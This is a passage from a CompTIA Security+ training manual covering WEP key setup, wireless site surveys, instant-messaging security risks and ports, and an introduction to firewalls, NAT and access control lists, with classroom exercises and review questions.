                  802.11i will help in this area, but perhaps the greatest need is in the area of educating
                  wireless network administrators and users about the inherent insecurity of wireless
                  systems and the need for additional care when using them.

                  WEP key
                  The 802.11 standard provides an optional Wired Equivalent Privacy (WEP)
                  specification for data encryption between wireless devices to increase privacy and
                  prevent eavesdropping. The access point and each station can have up to four shared
                  keys. Each key must correspond to the same key position in each of the other devices.
                                                                              Wireless and instant messaging    8–27

Do it!                         C-1: Generating a WEP key (demonstration only)
                                Here’s how                               Here’s why
Introduce this activity as a    1 In the Linksys utility, activate the
demonstration. Students           Setup tab
should observe only.

                                2 Select Mandatory




                                3 Click WEP Key Setting                  The WEP Key Setting window appears. This
                                                                         window allows you to set WEP encryption.




                                4 Select 128Bit encryption

                                  Leave the Mode set to HEX

                                5 In the Passphrase field, enter         Your screen should look like this:
                                  Paganini1




                                                                         Each point in your wireless network MUST use
                                                                         the same WEP encryption method and
                                                                         encryption key or else your wireless network
                                                                         will not function properly.
8–28   CompTIA Security+ Certification


                     6 Click Generate                      The system will generate four WEP encryption
                                                           keys based on the passphrase.




                     7 Click Apply                         To save the changes.

                     8 Close the window                    To return to the Setup tab.

                     9 Click Backup                        To store the Access Point configuration on your
                                                           local PC.

                        Save the file to your local hard
                        drive

                   10 Click Apply                          To complete the setup.

                   11 At this point, you would configure   Automated key generation can only be done
                      each device in your wireless         when the network adapter is the same brand and
                      network with the same                model as the WAP. If not, you would need to
                      configuration and encryption         manually enter the encryption keys in each
                                                           wireless device.
                      keys.

                   12 On the Setup window, select          To disable encryption.
                      Disable under WEP

                   13 Click Apply
                                                             Wireless and instant messaging       8–29

Do it!   C-2:   Understanding wired equivalent privacy
          Questions and answers
          1 Why is the initialization vector in WEP considered a security concern?
            • WEP sends the IV in plaintext across the WLAN, and it can be picked up by a hacker
                along the way
            • It is only 24 bits long
            • It creates weak keys
            • It is reused on a regular basis, allowing the hacker to see the pattern of reuse

          2 Describe war driving.

            This is the act of using a laptop and an antenna to locate wireless networks around town.

          3 WEP authenticates users, not clients. True or false?

            False: WEP authenticates clients.
8–30          CompTIA Security+ Certification

                         Conducting a wireless site survey
Explanation              Conducting a wireless site survey is a critical part of designing and implementing a
                         wireless network. It involves understanding the number and requirements of the people
                         who will be served by the network and the physical environment in which the network
                         will be deployed. Preparing for and conducting a site survey allows you to discover how
                         many access points you will need and where they should be placed to provide adequate
                         coverage throughout the facility.
                         The basic steps to conduct a site survey are:
                            1 Conduct a needs assessment of the network users.
                            2 Obtain a copy of the site’s blueprint.
                            3 Do a walk-through of the site.
                            4 Identify possible access point locations.
                            5 Verify access point locations.
                            6 Document your findings.
                         The amount of time and energy this process takes depends on the size and shape of the
                         facility and the number and requirements of the users. A larger organization requires
                         more careful analysis of the site, and it might take days or even weeks to conduct a site
                         survey. A site survey of a smaller organization might only require a few hours.

                         Conducting a needs assessment of the network users
                         In this step, it’s important to gain an understanding of the number of people that the
                         WLAN will serve as well as their data access needs.
                         On the one hand, you might discover there are only a few people who will use the
                         WLAN and that they will not be heavy users of network resources. For example, a small
                         group of upper-level executives who only want to take their laptops with them when
                         they walk down the hall from their offices to the company boardroom.
                         On the other hand, you might discover that almost everyone in a large organization
                         needs to be able to move frequently from one place to another and that each employee is
                         a heavy user of network resources. This might be the case in an engineering firm in
                         which users are part of multiple project teams that need to work together for limited
                         periods of time and then move on to their next project with another group of people.
                         In either case, it’s important for you to understand both where the users will use their
                         wireless laptops or other devices and how much bandwidth they will need to perform
                         their jobs. It’s also important to know if there are any plans to dramatically increase or
                         decrease the number of mobile users.

                         Obtaining a copy of the site’s blueprints
                         Radio waves are difficult to predict. An initial understanding of the site’s physical
                         layout can give you an idea of how best to place access points so that adequate wireless
                         coverage is provided to mobile users. Like wired networks, wireless LANs also have
                         barriers to the ‘pathways’ that the radio signals can travel, and you need to know this so
                         you can work around the barriers.
                         One of the best ways to gain this understanding is to obtain a copy of the site’s
                         blueprints or, if none are available, create your own floor plan. In this step, you want to
                         notice the position of walls, walkways, elevator shafts, and the locations of any other
                         structural elements that might present challenges to adequate access point coverage.
                                                   Wireless and instant messaging     8–31

Pay particular attention to materials used to construct the walls, floors, and ceilings of
the building. Certain materials tend to reflect some of the signal. Concrete, marble,
brick, water, and especially metal are difficult to work around.

Doing a walk-through of the site
After getting an idea of the layout of the site from the blueprints, it’s important that you
walk through the site to make sure the blueprints are accurate and to identify any other
barriers that might affect radio signals. For example, you might notice that partitions,
metal racks, or file cabinets have been placed in areas that originally appeared to be
wide open.
As you walk through the site, you need to identify other devices that operate in the same
radio frequency band as your WLAN, such as microwave ovens, medical equipment,
military communications equipment, and baby monitors. You also want to observe
whether or not there are existing wired network jacks and power outlets that you can use
to connect to the physical network and provide electricity to your access points.
You might need to determine in which areas of the building it might not be esthetically
pleasing to locate an access point and plan to make concessions for that space (such as
the company boardroom).

Identifying possible access point locations
Using the information you have gained in the preceding steps, you should be able to
approximate the locations of the access points that will provide adequate coverage for
mobile users. Areas that have high concentrations of mobile users require more access
points; however, you also need to be mindful of not placing access points too close
together in order to reduce interference between access points.
You should also have noticed where physical network jacks and electrical sockets need
to be installed. Consider the power needs of the wireless workstations that will be in
each area and the different types of antennas that might be needed in different spaces.
Confirm that environmental conditions are good (not too hot or too cold).
Once all of this information has been taken into account, you need to create a draft
design of the network from which to work as you go through the next step.

Verifying access point locations
Before you finalize your network plans, you need to verify your initial approximations
of AP location are correct. To do this, you need the proper tools, including at least one
access point (and a power cord to connect it to a source of electricity), a laptop equipped
with a wireless NIC, and software that can be used to identify the AP and monitor data
rates, signal strength, and signal quality.
Most wireless equipment vendors include this software with the AP or the wireless NIC,
but you can also download free software from wireless LAN vendors, such as Cisco,
3Com, and Symbol. Some vendors provide you with software that not only tests your
signal strength, but also provides you with a printout of the results, which will be
helpful in your posttest documentation.
8–32   CompTIA Security+ Certification

                  Once you have gathered all of the appropriate tools, you are ready to begin testing.
                     1 With your draft design in hand, go to each of the points that you have identified
                        as potential good locations for an AP, place the AP in those locations, and
                        monitor the site survey software to see what the results are as you walk around
                        the intended space.
                     2 You should also test for the amount of data throughput that is possible at various
                        points in the space.
                     3 Take detailed notices of these results and identify where you find strong and
                        weak signals.
                     4 If you are finding weak or dead spots, you need to reposition the AP until you
                        have full coverage of the space. In some cases, you might not find an ideal
                        location and will need to consider adding an additional access point in a location
                        to solve the problem.

                  Documenting your findings
                  Now that you have tested your initial assumptions about AP locations and made any
                  adjustments that were necessary, you need to document your findings. Your final plan
                  will allow for adequate wireless coverage in any area that the users indicated they would
                  need it. Careful drawings should be made and a list of your assumptions should be
                  spelled out.
                  The people who will install the wireless system that you have designed will use your
                  documentation, as might the network administrators who will support the wireless
                  network. In addition, a great amount of time, energy, and money will be saved in the
                  future if the network needs to be upgraded or expanded, as long as your documentation
                  is precise and thorough.
                                                                            Wireless and instant messaging   8–33

Do it!                          C-3:   Performing a site survey (demonstration only)
                                 Here’s how                            Here’s why
Introduce this activity as a     1 On the laptop computer, click the
demonstration. Students            Wireless Status icon
should observe only.

For this activity, you will                                            A drop-down menu appears.
need a laptop with a
Netgear MA401 PC Card
installed.

If the Wireless Status icon
is not displayed in the
system tray download and
install the latest version of
the Netgear MA401 driver.




If you have a different          2 Choose Wireless Network             The Status screen appears.
wireless network card, you         Status…
can right-click the wireless
connection icon in the
system tray and choose           3 Monitor the following output:
Status. The screens will
look different than those          Current Tx Rate
shown here, but will have          Signal Strength
similar information.
                                   Link Quality




Ask a student to roam            4 Roam around the room with the
about the room and                 laptop and watch for any changes
identify any objects that
influence the signal               in transmission rate, signal
strength and quality.              strength, and link quality
8–34     CompTIA Security+ Certification

Do it!              C-4:      Reviewing the wireless site survey
                      Questions and answers
                       1 What are the steps needed to conduct a wireless site survey?

                          The basic steps to conduct a site survey are:
                          1 Conduct a needs assessment of the network users.
                          2 Obtain a copy of the site's blueprint.
                          3 Do a walk-through of the site.
                          4 Identify possible access point locations.
                          5 Verify access point locations.
                          6 Document your findings.

                       2 Why is it important to document your findings when conducting a wireless site
                         survey?

                          The documentation is important to communicate your findings in the wireless site survey.
                          The people who will install the wireless system that you have designed will use your
                          documentation, as will network administrators. It’s essential to have this information for
                          support purposes on the wireless network. In addition, a great amount of time, energy, and
                          money will be saved in the future if the network needs to be upgraded or expanded, as long
                          as your documentation is precise and thorough.
                                                                              Wireless and instant messaging       8–35

Do it!                         C-5:   Resetting the WAP (demonstration only)
                                Here’s how                               Here’s why
Introduce this activity as a    1 In the Linksys utility, activate the
demonstration. Students           Password tab
should observe only.

                                2 At Restore Factory Defaults, click
                                  on Yes




                                3 Click Apply                            To save the changes. The system warns that
                                                                         your connection might be lost.




                                4 Click Continue                         To proceed to reset the WAP to the factory
                                                                         defaults. Your connection will be terminated.

                                5 Close Internet Explorer
8–36      CompTIA Security+ Certification


Topic D: Instant messaging
                     This topic covers the following CompTIA Security+ exam objective:

                      #      Objective

                      2.3    Recognize and understand the administration of the following Internet security concepts
                              • Instant messaging
                                  • Vulnerabilities
                                  • Packet Sniffing
                                  • Privacy




                     A definition of IM
Explanation          With the proliferation of instant messaging (IM) products comes an equal proliferation
                     of problems and security threats. Five currently available and frequently used flavors of
                     IM include: AOL Instant Messenger (AIM), MSN Messenger, Yahoo! Messenger, ICQ,
                     and Internet Relay Chat (IRC). Each of the five has suffered at least one major security
                     problem. In addition to the security problems inherent in each product, there is also a
                     series of generic problems that a technology manager faces when trying to lock down
                     IM.
                     Unlike e-mail, which uses a store and forward model, IM uses a real-time
                     communication model. When you type a message into an IM client and press the Enter
                     key, the text of that message is immediately sent to the client(s) to which you are
                     currently connected. This model makes IM easy, fast, and extremely dangerous.
                     IM networks operate in either peer-to-peer or peer-to-network configuration. In the
                     peer-to-peer model, client software communicates directly with one another; in the peer-
                     to-network model, client software logs onto a network, which then transfers the
                     messages between clients. Both models have pros and cons.
                     The peer-to-peer model does not rely on a central server; so as long as two client
                     software packages are not blocked, they can communicate with one another. This model
                     might cause the client to expose sensitive information such as the actual IP address of
                     the machine on which it is running.
                     The peer-to-network model relies on a central server (or group of servers) and,
                     therefore, there is a risk of a network outage making IM communication unavailable. In
                     addition, denial-of-service (DoS) attacks are becoming more frequent, and this increases
                     the likelihood that IM might not be available when you need it.

                     IM security issues
                     The instant messenger client is typically installed on an end-user’s workstation and
                     provides an interface for end-users to communicate with each other by utilizing the
                     server resources. The server manages and relays all end-user communication and is
                     typically maintained by a service provider such as AOL, Yahoo!, or Microsoft. The
                     server is also responsible for the authentication and notification of user status and
                     availability.
                                                                         Wireless and instant messaging    8–37

Ask students if they     Increased deployment of broadband networks, as well as availability of extra capacity in
can think of some        many networks, make instant messaging tools a very popular way of communication
applications for IM
within the work place.   both at home and in the work place. The increased usage of these tools also brings about
Answers might include    certain vulnerabilities that many organizations fail to understand and address. Many of
helpdesk support,        these services, although very convenient, do not have the security and encryption
remote meetings, and     features that are essential for transportation of sensitive and confidential data.
file transfer.

                         There are serious security concerns regarding the usage of consumer IM systems
                         because these systems can transport sensitive and confidential data over the public
                         networks in an unencrypted form. Corporations have no control over data transported in
                         such fashion once it leaves the corporate network infrastructure. On the other hand,
                         enterprise IM systems are administered in-house, making them considerably more
                         secure than the consumer IM systems.
                         Most popular consumer IM systems share some common security risks that need to be
                         addressed:
                             • IM systems typically do not prevent transportation of files that contain viruses
                               and Trojan horses. Such files can spread these dangerous viruses and cause
                               systems to malfunction or cease to function altogether.
                             • Misconfigured file sharing can provide access to sensitive or confidential data
                               including personal data, company information, and system passwords.
                             • The most visible security risk associated with most IM systems is the lack of
                               encryption. Such applications transfer data in plain HTML format, which can
                               easily be intercepted by an intruder. Sensitive information should always be
                               encrypted and digitally signed before transporting over a public network. The
                               use of a plaintext session can also lead to the session being hijacked, which can
                               be further exploited to obtain sensitive information.
                             • IM systems could be utilized for transportation of copyrighted material, which
                               could have substantial legal consequences. These include copyrighted pictures,
                               documents, music files, software, and so forth.
                             • Transferring files also reveals network addresses of hosts, which could be used
                               by attackers for malicious purposes such as a Denial-of-Service attack.
                         IM applications typically do not use well-known TCP ports for communication and file
                         transfers; instead, registered ports are used:
                             • AOL Instant Messenger uses TCP port 5190 for file transfers and file sharing,
                               but transportation of IM images takes place on TCP port 4443.
                             • NetMessenger uses TCP port 1863 for transportation of HTML-encoded
                               plaintext messages. Voice and video feed is relayed via a direct UDP connection
                               on ports 13324 and 13325. Application sharing takes place between clients over
                               TCP port 1503, and file transfers use TCP port 6891 on the initiator or client.
                             • Yahoo!’s Messenger typically uses TCP port 5050 for server communication
                               and TCP port 80 for direct file transfers.
                             • ICQ messages are also unencrypted and sent via TCP port 3570, and voice and
                               video traffic uses UDP port 6701.
8–38   CompTIA Security+ Certification

                  Safeguards
                  One can configure the firewall to filter some or all of these ports in order to restrict
                  either certain functionalities within corresponding IM applications or to prevent usage
                  altogether. It might be difficult to block the usage of IM systems such as Yahoo!’s
                  Instant Messenger because most of its traffic takes place over TCP port 80, which is the
                  standard TCP port for regular Internet traffic. In situations like this, it is also possible to
                  prevent usage by denying access to certain domains because, for instance, Yahoo!
                  Messenger requires the user to be logged onto a specific subdomain. Smart systems such
                  as intrusion detection systems (IDS) could be deployed to monitor and prevent IM
                  traffic. You can have your IDS inspect all inbound and outbound network activity and
                  identify suspicious patterns that might indicate a network or system attack from
                  someone attempting to break into or compromise a system.

                  Lack of default encryption enables packet sniffing
                  One of the key problems facing any IM client is that all messages are passed in plaintext
                  format unless the user takes some specific step to enable encryption. This makes any IM
                  session extremely vulnerable to packet sniffing, especially if that IM session is
                  occurring over an unencrypted wireless connection.
                  There are a few solutions to this problem, including enabling a private channel
                  communication, a step which turns on encryption on some IM products. Most notably
                  the Microsoft NetMeeting offers a secure connection option, which encrypts all traffic
                  between clients.
                  In addition, Enterprise AIM product from AOL and a freeware IM client called Trillian
                  from a company called Cerulean Studios (www.ceruleanstudios.com) both use
                  encryption to protect message contents. Encryption solves only half the problem facing
                  IM; it does nothing to address the issue of social engineering.

                  Social engineering overcomes even encryption
                  Social engineering, the obtaining of sensitive data by social means such as pretending to
                  be someone who already has access, is on the rise and is particularly problematic when
                  it comes to IM.
                  IM uses traditional username/password authentication to verify someone’s identity, it’s
                  moderately secure. The ease of use that IM provides means that it is possible for
                  someone to gain access to an unguarded terminal and communicate with the world as if
                  they were the actual user of that terminal. In such a case a “quick question” asked of
                  another employee at a company can easily result in a serious security breach.
                  Unlike e-mail which gives the person being questioned time to decide whether to
                  respond, IM demands an almost immediate decision on the part of the person being
                  questioned. Add to the situation the informal nature of IM, and you have a real problem.

                  Technical issues surrounding IM
                  As IM has matured, more features have been added. Current clients allow file transfer,
                  voice, video, whiteboard technology, and the ability to help someone out by “taking
                  over” their desktops. These features each come with their own security issues, but this
                  unit only addresses the two most troublesome: file transfers and application sharing.
                                                   Wireless and instant messaging     8–39

File transfers
The ability to send a file through IM is extremely powerful, but also very dangerous.
Unlike e-mail attachments, which can be scanned as they arrive on a corporate server,
IM attachments are much more difficult to handle and require an antivirus package on
the local machine receiving the attachment.

Application sharing
The ability to remotely control a computer can be a boon to help desk operators, but it
raises several issues. If the remote control software can be triggered by the remote site,
then a machine with IM software running might be taken over without anyone knowing
it. In addition, if the remote control software is being used by the remote site to connect
to a local site that has been physically breached, then all of the actions of the controlling
client might be seen by the wrong party.

Legal issues surrounding IM
Like e-mail, IM carries with it a possible threat of litigation or even criminal indictment
should the wrong message be sent or overheard by the wrong person. Corporations
spend millions each year to safeguard themselves from legal issues surrounding the
proper use of e-mail. Proper use chapters abound in employee handbooks, and some
businesses have even gone so far as to monitor the content of messages to ensure their
employees say nothing inappropriate.
IM is currently immune to most corporate efforts to control it. If a corporation allows
IM, then they are opening themselves up to a whole raft of legal problems. Unlike e-
mail, IM must be monitored in real time, as most IM clients do not keep a saved log of
messages unless the user expressly saves a dialog after a session.

Blocking IM
Blocking the use of IM is a straightforward task. If you install a corporate firewall of
some sort to block the ports that IM products use, you will make IM unavailable to your
employees, as limited blocking of IM is not possible at this time.
If your employees should make a convincing case that IM is useful, then the best that
can be done is make strong policies and limit IM clients to one or two vendors so you
can maximize control.

Cellular phone SMS
Simple Messaging Service (SMS) is a quasi form of IM provided by most cell phone
carriers. SMS is extremely similar to IM in that the messages are typed and sent
immediately. The tracking of inappropriate messages and the risk of having messages
sniffed are both problems with SMS technology.
8–40     CompTIA Security+ Certification

Do it!              D-1:      Discussing instant messaging
                      Questions and answers
                       1 Which of the following is a function of a typical instant messaging application?
                         (Choose all that apply.)
                          A    File share
                          B    Compiler
                          C    Voice and video communication
                          D    Chat

                       2 Which of the following is false regarding IM applications?
                          A    These applications typically do not incorporate encryption mechanisms.
                          B    Misconfigured file sharing within IM applications can lead to unwanted
                               access to personal data.
                          C    IM applications have built-in mechanisms that prevent the spreading of
                               viruses.
                          D    None of the above.

                       3 Specify the TCP or UDP port used for each of the following applications.

                          AOL file transfers                               TCP port 5190

                          NetMessenger messages                            TCP port 1863

                          NetMessenger voice and video traffic             UDP ports 11324 and 13325

                          NetMessenger file transfers                      TCP port 6891

                          Yahoo! Messenger file transfers                  TCP port 80

                          ICQ messages                                     TCP port 3570

                          ICQ voice and video traffic                      UDP port 6701

                       4 List three vulnerabilities associated with instant messaging.

                          Answers might include:
                          • IM uses real-time communications: transaction logging is optional.
                          • Messages are passed in plaintext format by default.
                          • If a hacker can gain access to an unguarded terminal, he or she can pose a quick
                              question that requires an immediate response on the part of the person being
                              questioned.
                          • Each client must have antivirus software installed to scan IM messages for viruses.
                          • A machine running IM software can be taken over with remote control software without
                              anyone knowing it. In addition, if the remote control software is used to connect to a local
                              site, all the actions of the controlling client can be seen by the wrong party.
                          • Impossible for corporations to monitor the content of messages.
                                                    Wireless and instant messaging         8–41

5 What are some of the legal issues surrounding Instant Messaging software in the
  workplace?

  IM carries with it a possible threat of litigation or even criminal indictment should the wrong
  message be sent to or received by the wrong person (similar to e-mail). Corporations spend
  millions each year to safeguard themselves from legal issues surrounding the proper use of
  e-mail. Many times businesses have even gone so far as to monitor the content of messages
  to ensure that their employees say nothing inappropriate.
8–42      CompTIA Security+ Certification


Unit summary: Wireless and instant messaging
Topic A              In this topic, you learned about security issues related to wireless data transfer and
                     802.11x standards. You learned that IEEE established the 802.11 working groups to
                     create standards of operability related to the interface between wireless clients and their
                     network access points in a local area network environment.
Topic B              In this topic, you learned about Wireless Application Protocol (WAP) and how it
                     works. You learned that WAP is an open, global specification that was created by the
                     WAP Forum to deliver information and services to users of handheld digital devices.
Topic C              In this topic, you learned about Wired Equivalent Privacy (WEP). You learned that
                     WEP is the encryption mechanism that was specified by the 802.11b protocol to provide
                     authentication and confidentiality in a wireless LAN (WLAN) environment.
Topic D              In this topic, you learned about instant messaging. You learned that instant messaging
                     (IM) is a process and application that allows users to send and receive messages in real
                     time. IM can be used on both wired and wireless devices. You also learned that there are
                     serious security concerns regarding the usage of consumer IM systems because these
                     systems can transport sensitive and confidential data over the public networks in an
                     unencrypted form.

                     Review questions
                       1 One way to secure a wireless network is to use a:
                         A Firewall
                         B Scrambler
                         C   VPN
                         D DMZ
                       2 A recommended practice for wireless LANS is to: (Choose all that apply.)
                         A Disable file and print sharing
                         B Disable NetBEUI
                         C   Enable WEP protection

                         D   Use a strong encryption key

                         E All of the above
                       3 Which of the following can interfere with wireless transmission? (Choose all that
                         apply.)
                         A   Brick walls

                         B Cell phones
                         C   Cordless phones

                         D   Distance
                                              Wireless and instant messaging      8–43

4 The 802.11a standard can use which of the following bands?
  A 2.4GHz
  B   5GHz
  C 2.4MHz
  D 5MHz
5 The 802.11b standard can use which of the following bands?
  A   2.4GHz
  B 5GHz
  C 2.4MHz
  D 5MHz
6 The 802.11a standard can transmit data at speeds of up to _____Mbps.
  A 11
  B 36
  C 48
  D   54
7 Which of the following protocols is used to encrypt wireless transmission?
  A WAP
  B   WEP
  C WSP
  D WDP
8 The IEEE working group F has been tasked with creating a standard to allow for
  better roaming between access points and distribution systems. True or false?
  True

9 Which of the following is part of the WAP 1.x stack? (Choose all that apply.)
  A   WAE

  B   WTP

  C WSSL
  D   WDP
  E WIP
8–44   CompTIA Security+ Certification

                  10 WAP 2.0 has added a number of features that include which of the following?
                     (Choose all that apply.)
                      A WAP Push
                      B User agent profile
                      C Wireless Telephony Application
                      D External Functionality Interface (EFI)
                      E Multimedia Messaging Service (MMS)
                      F   All of the above
                  11 Instant messaging networks operate in either ______________ or ___________
                     configurations. (Choose all that apply.)
                      A   peer-to-network
                      B network-to-network
                      C client/server
                      D   peer-to-peer
                  12 AOL Instant Messenger uses which TCP port?
                      A   5190
                      B 5050
                      C 80
                      D 1023
                                                                9–1


Unit 9
Network devices
                  Unit time: 120 minutes

                  Complete this unit, and you’ll know how to:

                  A Describe the purpose of a network firewall
                     and how firewalls are implemented.

                  B Explain how routers can be configured to
                     provide additional security to a network.

                  C Identify the vulnerabilities of switches.

                  D Describe the proper measures for securing
                     telecom, cable modem, and wireless
                     communications devices.

                  E Provide a secure remote connection
                     through RAS and VPN technologies.

                  F Identify the different types of intrusion
                     detection systems.

                  G Perform network monitoring.
9–2           CompTIA Security+ Certification


Topic A: Understanding firewalls
                         This topic covers the following CompTIA Security+ exam objective:

                          #      Objective

                          3.1    Understand security concerns and concepts of the following types of devices
                                  • Firewalls




                         Firewall concepts
Explanation              There are really only two principal ways to secure a computer or network of computers
                         from external breach: either physically isolate the computer or network from the outside
                         world by disconnecting the network and telecom cables that provide contact with any
                         other computers or networks; or virtually isolate the computer or network by
                         implementing a firewall to stand guard between the outside world and the computer or
                         network.
                         A firewall is a barrier that isolates one network from another. Its main function is to
                         protect an internal, private network from unauthorized access by an external, public
                         network. The firewall can be a dedicated physical device or a software feature added to
                         a router, switch, or other similar device. There are many ways to build a network
                         firewall, but the following five steps will ensure that you have not missed anything:
                             1 Draft a written security policy. A well-written security policy ensures that the
                                 necessary blend of security and services is provided to the organization.
                             2 Design the firewall to implement the security policy.
                             3 Implement the firewall design by installing the selected hardware and software.
                             4 Test the firewall. It’s fine to say you have a firewall, but if it doesn’t work as
                                 intended, it might give you a false sense of security, increasing potential risk.
                             5 Review new threats, requirements for additional security, and updates to adopted
                                 systems and software. If additions or modifications are necessary, repeat the
                                 process from step one, in light of these changes.
                         This is the management cycle for firewall protection, but the requirements of each,
                         especially the first item, are often minimized or skipped, because most corporate
                         managers find network security to be an arcane subject.

                         Drafting a security policy
                         Before implementing any security system, you should ask the following questions: What
                         am I protecting? Whom am I protecting it from? What services does my company need
                         to access over the network? Who gets access to which resources? Finally, who
                         administers the network? By carefully considering these questions, you can draft a
                         robust security policy.

                         Available targets and who is aiming at them
                         In answering the first and second questions, you need to determine what resources
                         within your company need to be protected. Common areas of attack are Web servers,
                         mail servers, FTP services, and databases. It’s recommended that you complete a full
                         audit of the resources in your organization so you have a better understanding of what
                         targets are available.
                                                                    Network devices   9–3

Scan for services that were not explicitly authorized by the company. Some employees
might setup ad hoc FTP servers or Web servers, so it is critical to scan for open ports at
all addresses. In addition, consider who might want to circumvent your security
measures, and identify their motives. The types of hackers range from sport hackers,
who are satisfied with merely penetrating your defenses, to hackers whose intent is
causing damage or theft.

Which services should be made available?
In answering the third question, you should catalogue which services need to be
available to your company’s employees. Available services might provide access to
intruders, so it’s imperative you lock out those services that are not needed. The
following table is a table of common port mappings:

 Service                               TCP port #                   UDP port #

 Dial Pad                              51210                        51200, 51201

 DNS                                   53                           53

 FTP                                   20, 21

 ICQ                                   4000

 IPSEC                                 500

 IRC (Estimation)                      6661-6667                    1080-6660

 HTTP                                  80

 HTTPS                                 443                          443

 NetMeeting                            389, 522, 1503, 1720, 1731

 NNTP                                  119

 Novell VPN software (BorderManager)   353, 2010, 213

 pcAnywhere 2.0, 7.0, 7.50, 7.51       65301                        22

 POP3                                  110

 PPTP                                  1723

 SMTP                                  25

 SSH                                   22, 1019-1023                22, 1019-1023

 SNMP                                  161

 Telnet                                23

 TFTP                                                               69

 AOL Instant Messenger                 5190, 4443


By blocking those ports that correspond to services you do not need, your system will
be more secure.
9–4      CompTIA Security+ Certification

                    Who gets access to which resources?
                    In addition to determining which services are required, you must determine who should
                    have access to which resources within your network. You should list the employees or
                    groups of employees along with the files, file servers, databases, and database servers to
                    which they need access. In addition, you should list which employees need remote
                    access to the network.

                    Who administers the network?
                    This question is easily answered, as it will be you who will be administering the
                    network. On larger networks, however, there might be more than one person responsible
                    for administering the network. These people, and the scope of individual management
                    control, need to be determined up front.

Do it!              A-1:      Drafting a security policy
                      Questions and answers
                       1 What is a firewall?

                          A firewall is a barrier that isolates one network from another. Its main function is to protect
                          an internal, private network from unauthorized access by an external, public network.

                       2 What are the recommended steps to build a network firewall? (Choose all that
                         apply.)
                          A      Draft a written security policy.
                          B      Design the firewall to implement the security policy.
                          C      Implement the firewall design by installing the selected hardware and/or software.
                          D      Test the firewall.
                          E      Review new threats.
                          F      All of the above.

                       3 One of the steps to drafting a security policy is to catalogue which services need
                         to be available to your company’s employees and lock out all services that are not
                         needed. True or false?

                          True
                                                                               Network devices       9–5

              Designing the firewall to implement the policy
Explanation   Once you have your written security policy, you can begin the process of selecting the
              appropriate technology to deploy as your firewall. Reading through the remainder of
              this unit will familiarize you with available technologies and give you an understanding
              of what should be used under which circumstances.

              What do firewalls protect against?
              Firewalls effectively protect against malicious packets from the outside and
              unauthorized Internet access from within the company. There are several common
              network attacks that can be successfully blocked by a properly configured and
              functioning firewall: denial of service (DoS), ping of death, Teardrop or Raindrop
              attacks, SYN flood, LAND attack, brute force or smurf attacks, IP spoofing, and others.
              Firewalls offer no protection against malicious attacks from internal users.

              How do firewalls work?
              At their core, all firewalls protect networks using some combination of the following
              techniques:
                  • Network address translation (NAT)
                  • Basic packet filtering
                  • Stateful packet inspection (SPI)
                  • Access control lists (ACL)
              Basic firewalls use only one technique, usually NAT, but firewalls that are more
              comprehensive use all of the techniques combined. As added features usually increase
              complexity and cost however, it’s a good idea to closely examine your needs as written
              down in your security policy and implement only those solutions that are appropriate.

              Network address translation
              One of the most common security features offered by most firewalls is network address
              translation (NAT). NAT gives you the ability to mask the IP addresses of those
              computers behind the firewall from the external world.
              Even though private addresses are used internally, all internal routers have a default
              route that directs public addresses to a specific NAT router. Each time a connection is
              made from an internal private address, the NAT router selects an available public
              address from a pool of available IPs and inserts it into the packet prior to forwarding it
              on to the external network. A table that maps internal to external addresses is
              maintained to ensure proper mapping for the duration of the connection. Neither the
              host nor the client involved in the connection is aware of the intervening NAT, so no
              special accommodations need to be made in client or server applications.
              The problem with basic NAT is that each active connection requires a unique external
              address for the duration of the communication. With the increased use of the Web, a
              much higher percentage of internal systems are likely to be connected to the public
              network at a given time. Under basic NAT, this requires a much larger pool of public
              addresses. A derivative of NAT, port addresses translation (PAT) tackles this issue by
              supporting thousands of simultaneous connections on a single public IP address.
9–6   CompTIA Security+ Certification

                 Port address translation
                 PAT guarantees a unique connection by using a combination of an IP address and a
                 TCP or UDP port, called a socket, rather than the address alone. When an internal
                 system connects to an external resource, it typically selects a short-lived source port to
                 create a unique socket. When the request routes through the NAT, the IP address is
                 changed to a public address and a short-lived port is selected that guarantees
                 uniqueness. A table of the source address, source port, NAT source IP, NAT source
                 port, destination IP, and destination port is maintained by the router. The combination of
                 NAT source IP and NAT source port and destination IP and port are guaranteed to be
                 unique.
                 PAT is really a subset of NAT and is now available in very inexpensive routers
                 available for home use. This provides a useful method for conserving IP addresses, as
                 well as concealing internal system identities. A drawback of this method is with the
                 server—each external IP address can only support a single process on any given port,
                 although the NAT router can direct these connections to different internal systems. NAT
                 with port address translation is shown in the following table:

                  Inside Source           Outside Source Address: Port              Outside Destination
                  Address: Port                                                     Address

                  10.1.1.2:1100           192.50.20.1:1024                          192.50.20.2

                  10.1.1.3:1200           192.50.20.1:1025                          192.50.20.3



                 Basic packet filtering
                 After NAT, the most basic security function performed by a firewall is packet filtering.
                 Packet filters decide whether to forward individual TCP/IP packets based on
                 information contained in the packet header and on filtering rules set by the network
                 administrator. Most packet filters can be configured to screen information based on the
                 following data fields: protocol type, IP address, TCP/UDP port, and source routing
                 information.
                 Improper filtering can end up blocking valid packets or permitting rogue packets. For a
                 more thorough discussion of network packet handling, see the section on routers later in
                 this unit.

                 Stateful firewalls
                 Stateful firewalls represent a major advancement in firewall technology. They keep a
                 record of every network connection in which they participate. They can record session-
                 specific information, including which ports are in use on the client and server. This is
                 important because, although most Internet services run on well-known ports, Internet
                 clients might be using any port above 1023.
                 A basic (stateless) packet filter must let Web servers respond to browsers at one of these
                 high port numbers, but it can’t tell which one, so it leaves them all open.
                 Stateful packet inspection enhances security by allowing the filter to distinguish on
                 which side of the firewall a connection was initiated. This latter feature is essential to
                 blocking IP spoofing attacks.
                 A stateful packet filter monitors the three-way handshake that initiates a TCP
                 connection. Only TCP packets that are identified as being a part of the handshake, or
                 can be identified with an established connection, are allowed through the firewall.
                                                                  Network devices        9–7

Some filters even respond to connection requests on behalf of the internal server until
the three-way handshake is properly completed by mimicking the connection to the
internal server, and then they begin passing packets once the connection is made. Once
a session is properly ended or times out, no additional packets are allowed on that
connection without a new three-way handshake. This is an effective countermeasure
against SYN floods.

Access control lists
Traffic filtering is available through access control lists (ACL). A Cisco router provides
different levels of filtering; using either the standard or the extended list (the latter
allows filtering by different criteria).
The basic syntax is as follows:
    access-list list_number               permit/deny        source_IP_address          ►
    network_mask
For example, to stop any inbound packet with an internal (spoofed) source IP address:
    access-list        101    deny 10.13.31.0          0.0.0.255
At the same time, to let all outbound internal packets through with a legitimate source
IP address include:
    access-list        102    permit      10.13.31.0       0.0.0.255
Access lists are executed from first statement to last until a match on the inspected
packet is found, then all processing of the list stops, and the rule of the first match is
applied. There is an implied “deny everything else” at the end of every list so if no
matches occur, the packet is denied by default.
9–8      CompTIA Security+ Certification

